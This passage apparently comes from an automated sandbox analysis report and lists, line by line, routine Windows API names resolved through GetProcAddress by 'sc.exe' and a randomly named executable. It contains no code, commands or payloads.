parameter ImmFreeLayout (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002472)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002820)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002820)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001512)\n 